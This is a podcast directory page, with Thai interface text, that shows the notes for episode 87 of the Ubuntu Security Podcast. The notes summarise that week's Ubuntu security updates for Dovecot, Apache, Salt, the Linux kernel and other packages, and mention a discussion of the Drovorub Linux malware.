This is the audio podcast version of Troy Hunt's weekly update video published here: https://www.troyhunt.com/tag/weekly-update/
…
continue reading
เนื้อหาจัดทำโดย Alex Murray and Ubuntu Security Team เนื้อหาพอดแคสต์ทั้งหมด รวมถึงตอน กราฟิก และคำอธิบายพอดแคสต์ได้รับการอัปโหลดและจัดเตรียมโดย Alex Murray and Ubuntu Security Team หรือพันธมิตรแพลตฟอร์มพอดแคสต์โดยตรง หากคุณเชื่อว่ามีบุคคลอื่นใช้งานที่มีลิขสิทธิ์ของคุณโดยไม่ได้รับอนุญาต คุณสามารถปฏิบัติตามขั้นตอนที่อธิบายไว้ที่นี่ https://th.player.fm/legal
Player FM - แอป Podcast
ออฟไลน์ด้วยแอป Player FM !
ออฟไลน์ด้วยแอป Player FM !
Episode 87
MP3•หน้าโฮมของตอน
Manage episode 270070173 series 2423058
เนื้อหาจัดทำโดย Alex Murray and Ubuntu Security Team เนื้อหาพอดแคสต์ทั้งหมด รวมถึงตอน กราฟิก และคำอธิบายพอดแคสต์ได้รับการอัปโหลดและจัดเตรียมโดย Alex Murray and Ubuntu Security Team หรือพันธมิตรแพลตฟอร์มพอดแคสต์โดยตรง หากคุณเชื่อว่ามีบุคคลอื่นใช้งานที่มีลิขสิทธิ์ของคุณโดยไม่ได้รับอนุญาต คุณสามารถปฏิบัติตามขั้นตอนที่อธิบายไว้ที่นี่ https://th.player.fm/legal
Overview
This week we look at the Drovorub Linux malware outed by the NSA/FBI plus we detail security updates for Dovecot, Apache, Salt, the Linux kernel and more.
This week in Ubuntu Security Updates
24 unique CVEs addressed
[USN-4456-1, USN-4456-2] Dovecot vulnerabilities [00:46]
- 3 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
- 3 DoS issues - nested MIME -> resource exhaustion, Compuserve RPA auth mechanism (rare) -> zero length message -> assert fail, NTLM missing length check -> buffer over read -> crash
[USN-4457-1, USN-4457-2] Software Properties vulnerability [01:39]
- 1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
- add-apt-repository ANSI escape sequence display from launchpad PPA description
[USN-4458-1] Apache HTTP Server vulnerabilities [02:27]
- 5 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
- mod_rewrite could be tricked into redirecting to an unexpected URL via newlines encoded into the request URL
- use of uninitialized memory when proxying to a malicious FTP server -> info leak
- 2 HTTP/2 issues - improper handling of Cache-Digest headers and certain logging statements -> crash, DoS
- buffer overflow in mod_proxy_uwsgi - crash / code exec
[USN-4459-1] Salt vulnerabilities [03:18]
- 5 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS)
- File enumeration on remote server -> info leak
- Authentication bypass
- Command injection from unauthenticated users -> code exec on salt-api host
- Failure to validate method calls and sanitize paths - access control bypass
[USN-4460-1] Oniguruma vulnerabilities [03:58]
- 4 CVEs addressed in Trusty ESM (14.04 ESM)
- regex library used by PHP and Ruby -> various issues leading to DoS / info leak etc
[USN-4461-1] Ark vulnerability [04:20]
- 1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
- KDE archive handler - malicious ZIP files could contain files outside the working directory (zip-slip)
[USN-4465-1] Linux kernel vulnerabilities [04:50]
- 3 CVEs addressed in Bionic (18.04 LTS)
- 5.3 (hwe)
- Memory leak in USB testing driver on disconnect - so physical attacker could add / remove device and eventually exhaust memory
- bcache deadlock -> DoS
- Crafted XFS metadata could cause a sync of excessive duration -> DoS
[USN-4462-1] Linux kernel vulnerability [05:53]
- 1 CVEs addressed in Bionic (18.04 LTS)
- 5.0 (gke / oem)
- bcache deadlock -> DoS
[USN-4463-1] Linux kernel vulnerabilities [06:06]
- 2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS)
- 4.4 (xenial / trusy esm hwe)
- bcache deadlock
- usb testing driver memory leak
[USN-4464-1] GNOME Shell vulnerability [06:24]
- 1 CVEs addressed in Focal (20.04 LTS)
- Could show the login password when logging out if had set it visible during login
[USN-4466-1] curl vulnerability [06:53]
- 1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
- libcurl - improper handling of the CURLOPT_CONNECT_ONLY option -> could connect to wrong destination and so expose sensitive info
Goings on in Ubuntu Security Community
Joe and Alex discuss Drovorub Linux malware [07:24]
Get in contact
231 ตอน
MP3•หน้าโฮมของตอน
Manage episode 270070173 series 2423058
เนื้อหาจัดทำโดย Alex Murray and Ubuntu Security Team เนื้อหาพอดแคสต์ทั้งหมด รวมถึงตอน กราฟิก และคำอธิบายพอดแคสต์ได้รับการอัปโหลดและจัดเตรียมโดย Alex Murray and Ubuntu Security Team หรือพันธมิตรแพลตฟอร์มพอดแคสต์โดยตรง หากคุณเชื่อว่ามีบุคคลอื่นใช้งานที่มีลิขสิทธิ์ของคุณโดยไม่ได้รับอนุญาต คุณสามารถปฏิบัติตามขั้นตอนที่อธิบายไว้ที่นี่ https://th.player.fm/legal
Overview
This week we look at the Drovorub Linux malware outed by the NSA/FBI plus we detail security updates for Dovecot, Apache, Salt, the Linux kernel and more.
This week in Ubuntu Security Updates
24 unique CVEs addressed
[USN-4456-1, USN-4456-2] Dovecot vulnerabilities [00:46]
- 3 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
- 3 DoS issues - nested MIME -> resource exhaustion, Compuserve RPA auth mechanism (rare) -> zero length message -> assert fail, NTLM missing length check -> buffer over read -> crash
[USN-4457-1, USN-4457-2] Software Properties vulnerability [01:39]
- 1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
- add-apt-repository ANSI escape sequence display from launchpad PPA description
[USN-4458-1] Apache HTTP Server vulnerabilities [02:27]
- 5 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
- mod_rewrite could be tricked into redirecting to an unexpected URL via newlines encoded into the request URL
- use of uninitialized memory when proxying to a malicious FTP server -> info leak
- 2 HTTP/2 issues - improper handling of Cache-Digest headers and certain logging statements -> crash, DoS
- buffer overflow in mod_proxy_uwsgi - crash / code exec
[USN-4459-1] Salt vulnerabilities [03:18]
- 5 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS)
- File enumeration on remote server -> info leak
- Authentication bypass
- Command injection from unauthenticated users -> code exec on salt-api host
- Failure to validate method calls and sanitize paths - access control bypass
[USN-4460-1] Oniguruma vulnerabilities [03:58]
- 4 CVEs addressed in Trusty ESM (14.04 ESM)
- regex library used by PHP and Ruby -> various issues leading to DoS / info leak etc
[USN-4461-1] Ark vulnerability [04:20]
- 1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
- KDE archive handler - malicious ZIP files could contain files outside the working directory (zip-slip)
[USN-4465-1] Linux kernel vulnerabilities [04:50]
- 3 CVEs addressed in Bionic (18.04 LTS)
- 5.3 (hwe)
- Memory leak in USB testing driver on disconnect - so physical attacker could add / remove device and eventually exhaust memory
- bcache deadlock -> DoS
- Crafted XFS metadata could cause a sync of excessive duration -> DoS
[USN-4462-1] Linux kernel vulnerability [05:53]
- 1 CVEs addressed in Bionic (18.04 LTS)
- 5.0 (gke / oem)
- bcache deadlock -> DoS
[USN-4463-1] Linux kernel vulnerabilities [06:06]
- 2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS)
- 4.4 (xenial / trusy esm hwe)
- bcache deadlock
- usb testing driver memory leak
[USN-4464-1] GNOME Shell vulnerability [06:24]
- 1 CVEs addressed in Focal (20.04 LTS)
- Could show the login password when logging out if had set it visible during login
[USN-4466-1] curl vulnerability [06:53]
- 1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
- libcurl - improper handling of the CURLOPT_CONNECT_ONLY option -> could connect to wrong destination and so expose sensitive info
Goings on in Ubuntu Security Community
Joe and Alex discuss Drovorub Linux malware [07:24]
Get in contact
231 ตอน
すべてのエピソード
×ขอต้อนรับสู่ Player FM!
Player FM กำลังหาเว็บ